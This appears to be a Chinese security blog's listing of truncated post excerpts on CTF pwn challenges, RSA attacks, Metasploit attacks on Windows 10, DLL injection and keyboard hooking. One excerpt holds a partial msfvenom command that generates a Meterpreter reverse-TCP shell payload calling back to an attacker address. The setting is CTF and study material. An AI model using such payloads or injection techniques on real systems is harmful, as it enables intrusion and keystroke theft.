九层台

鱼跃此时海

一次攻击(mateploit攻击windows 10总结)

攻击机:kali2018.3(需要一个metaploit) 受攻击者:windows10(需要关掉杀软,windows自带的也要关掉) 0x01生成 windows $msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LP...

2018-10-26 21:45:16

阅读数 1062

评论数 2

护网杯

0x01task_gettingStart_ktQeERc 数组溢出,把数据填充进去就行(0.1都已经被ida识别了意味着一定能在ida里面找到0.1) from pwn import * p=remote("49.4.79.193",32449) paylo...

2018-10-20 20:04:04

阅读数 274

评论数 0

RSA攻击方法整理

RSA算法简述 ① 选两个保密的大素数p和q。 ② 计算n=p×q,φ(n)=(p-1)(q-1),其中φ(n)是n的欧拉函数值。 ③ 选一整数e,满足1<e<φ(n),且gcd(φ(n),e)=1。 ④ 计算d,满足d·e≡1 mod ...

2018-10-20 16:14:34

阅读数 1232

评论数 1

ctf pwn出题和搭建环境

学校要举办校赛,需要出pwn题目和搭建环境。遇到了几个坑在这里填一下。 然后感谢一纸笔墨大佬的帮忙。 出题 出题遇到了一个问题在程序运行的时候输入和输出的顺序是反的。 $ ./pwn1 If you can get the shell, you will be out good luck!! ...

2018-10-11 18:47:16

阅读数 680

评论数 0

修改PE文件注入dll

修改思路 PE文件中导入dll信息以结构体列表形式存储在IDT中。只要将myhack.dll添加到列表尾部即可。 IDT结构 IDT的描述在IMAGE_OPTION_HEADER里面的IMPORT Table,通过size可以确定是否有足够的空间让我们添加 IDT是由IMAGE_IMPORT_D...

2018-10-09 14:15:05

阅读数 682

评论数 0

dll的注入与卸载

使用方法: 需要三个命令行参数 1.flag 0表示注入,1表示卸载(注意卸载需要管理员权限) 2.dll的路径(名字) 注入需要路径和名字,卸载需要名字就够了 3.需要注入或卸载的进程名字 这里添加了改进,只需要输入进程名字程序会查找PID。 #include&quot...

2018-10-04 18:38:56

阅读数 940

评论数 0

windows简单消息勾取和dll注入

来源《逆向工程核心原理》 运行notepad.exe可以劫持notepad.exe的键盘输入 HookMain.cpp //HookMain.cpp #include"stdio.h" #include"conio.h...

2018-10-03 22:05:39

阅读数 193

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭